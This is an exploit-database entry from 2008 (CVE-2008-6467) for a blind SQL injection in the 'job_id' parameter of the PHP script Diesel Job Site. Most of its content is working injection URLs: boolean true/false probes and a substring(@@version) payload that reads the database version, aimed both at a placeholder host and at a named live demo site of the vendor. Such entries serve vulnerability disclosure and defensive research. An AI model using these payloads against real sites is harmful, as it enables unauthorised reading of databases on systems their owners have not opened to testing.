[] NeoSense

Diesel Job Site - 'job_id' Blind SQL Injection

Author: Stack
type: webapps
platform: php
port: 
date_added: 2008-09-20 
date_updated: 2016-12-22 
verified: 1 
codes: OSVDB-52724;CVE-2008-6467 
tags: 
aliases:  
screenshot_url:  
application_url: 

Diesel Job Site Blind Sql Injection P0c
Author : Stack
Home Script :  http://www.dieselscripts.com

Desc :
look the select Job Viewed: in [real id]+and+1=1 (true) the times change each time
but in [real id]+and+1=0 (false) it remains stable

go to url exploit or poc 2 or 3 times for see the difference
between (true) and (false)

P0c :
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=1
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+1=0
Exploit :
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=5
http://site.il/jobs/jobseekers/job-info.php?job_id=[real id]+and+substring(@@version,1,1)=4
Live Demo P0c :
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=1
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+1=0
Live Demo Exploit :
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=5
http://www.dieselscripts.com/demo/jobs/jobseekers/job-info.php?job_id=56+and+substring(@@version,1,1)=4

# milw0rm.com [2008-09-21]